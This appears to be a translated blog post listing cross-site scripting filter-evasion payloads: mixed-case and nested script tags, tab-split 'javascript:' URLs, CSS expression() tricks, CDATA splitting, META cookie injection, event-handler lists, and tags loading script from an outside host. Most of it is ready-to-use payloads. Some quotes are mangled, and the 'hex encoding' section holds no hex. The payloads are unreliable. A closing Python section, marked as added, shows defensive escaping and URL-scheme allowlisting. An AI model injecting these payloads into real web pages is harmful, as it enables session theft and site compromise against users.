1. Change the case of characters

<sCript>alert(‘d’)</scRipT>

2. Add extra characters to evade regular-expression checks

<<script>alert(‘c’)//<</script>

<SCRIPT a=">" SRC="t.js"></SCRIPT>

<SCRIPT =">" SRC="t.js"></SCRIPT>

<SCRIPT a=">" ” SRC="t.js"></SCRIPT>

<SCRIPT "a=’>’" SRC="t.js"></SCRIPT>

<SCRIPT a=`>` SRC="t.js"></SCRIPT>

<SCRIPT a=">’>" SRC="t.js"></SCRIPT>
3. Replace .js with another extension

<script src="bad.jpg"></script>

4. Put JavaScript in a CSS file

<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">

example:

body {
background-image: url(‘javascript:alert("XSS");’)
}
5. Insert other characters into the script tag

<SCRIPT/SRC="t.js"></SCRIPT>

<SCRIPT/anyword SRC="t.js"></SCRIPT>

6. Use a tab or a newline to evade

<img src="jav ascr ipt:alert(‘XSS3′)">

<img src="jav ascr ipt:alert(‘XSS3′)">

<IMG SRC="jav ascript:alert(‘XSS’);">

-> tab

-> new line
7. Use "\" to evade

<STYLE>@im\port’\ja\vasc\ript:alert("XSS32")’;</STYLE>

<IMG STYLE=’xss:expre\ssion(alert("XSS33"))’>

<IMG STYLE="xss:expr/*anyword*/ession(alert(‘sss’))">

<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">

<A STYLE=’no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))’>

8. Use hex encoding to evade (the ";" may also be dropped)

<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">

Source: <DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">

<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">

Source: <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">
9. Script in an HTML tag

<body onload=」alert(‘onload’)」>

onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload

10. XSS code contained in an swf

<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>

11. Use CDATA to split the XSS code and reassemble it.

<XML ID=I><X><C>
<![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
</C></X>
</xml>

<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>

<XML ID="xss"><I><B><IMG SRC="javas<!– –>cript:alert(‘XSS’)"></B></I></XML>

<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
12. Use HTML+TIME.

<HTML><BODY>
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
<?import namespace="t" implementation="#default#time2">
<t:set attributeName="innerHTML" to="anyword<SCRIPTDEFER>alert("XSS")</SCRIPT>">
</BODY></HTML>

13. Write a cookie via META.

<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(‘XSS’)</SCRIPT>">

14. javascript in src, href, url

<IFRAME SRC=javascript:alert(’13′)></IFRAME>

<img src="javascript:alert(‘XSS3′)">

<IMG DYNSRC="javascript:alert(‘XSS20′)">

<IMG LOWSRC="javascript:alert(‘XSS21′)">

<LINK REL="stylesheet" HREF="javascript:alert(‘XSS24′);">

<IFRAME SRC=javascript:alert(‘XSS27′)></IFRAME>

<TABLE BACKGROUND="javascript:alert(‘XSS29′)">

<DIV STYLE="background-image: url(javascript:alert(‘XSS30′))">

<STYLE TYPE="text/css">.XSS{background image:url("javascript:alert(‘XSS35′)");}
</STYLE><A CLASS=XSS></A>

<FRAMESET><FRAME SRC="javascript:alert(‘XSS’);"></FRAMESET>
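A defender-side check added here as an example (not part of the original post): it shows why the case-sensitive blocklist that sections 1, 2 and 6 defeat is not a defence, and what to use instead: encode untrusted text for the HTML context, and allowlist URL schemes only after stripping the control characters browsers ignore inside a URL. The sample strings are constructed from the evasion classes listed above; `ALLOWED_SCHEMES` and the function names are this example's own.

```python
import html
import re

# Constructed samples, modelled on the evasion classes the post lists
# (mixed case, nested tags, a tab or newline inside "javascript:").
SAMPLES = {
    "mixed_case": "<sCript>alert('d')</scRipT>",
    "nested_tag": "<<script>alert('c')//<</script>",
    "tab_in_scheme": "jav\tascr\nipt:alert('XSS3')",
}


def naive_blocklist(text: str) -> str:
    """Case-sensitive blocklist of the kind the post shows being evaded.
    Kept only to demonstrate that pattern stripping is not a defence."""
    return re.sub(r"<script>.*?</script>", "", text)


def escape_for_html(text: str) -> str:
    """Output encoding for an HTML text context: every '<', '>', '&' and
    quote becomes an entity, so case tricks and nested tags are irrelevant
    because the browser never sees markup at all."""
    return html.escape(text, quote=True)


def still_contains_markup(text: str) -> bool:
    return "<" in text or ">" in text


_SCHEME = re.compile(r"^([a-z][a-z0-9+.\-]*):", re.IGNORECASE)
ALLOWED_SCHEMES = {"http", "https"}  # example allowlist, adjust per app


def is_safe_url(url: str) -> bool:
    """Allowlist the scheme of a value destined for src/href.
    Browsers ignore tab, CR, LF and other C0 controls inside a URL, so they
    are removed before the check; otherwise 'jav<TAB>ascript:' would not
    look like 'javascript:' here. Scheme-less (relative) URLs are allowed."""
    cleaned = re.sub(r"[\x00-\x20]", "", url)
    match = _SCHEME.match(cleaned)
    if match is None:
        return True
    return match.group(1).lower() in ALLOWED_SCHEMES


if __name__ == "__main__":
    for name in ("mixed_case", "nested_tag"):
        survived = still_contains_markup(naive_blocklist(SAMPLES[name]))
        print(f"{name}: survives blocklist={survived}; "
              f"escaped={escape_for_html(SAMPLES[name])}")
    print("tab_in_scheme allowed:", is_safe_url(SAMPLES["tab_in_scheme"]))
```

Run the scheme check on the raw untrusted value and then attribute-encode it when inserting, so an entity-encoded tab in the input is emitted as literal text rather than decoded by the browser.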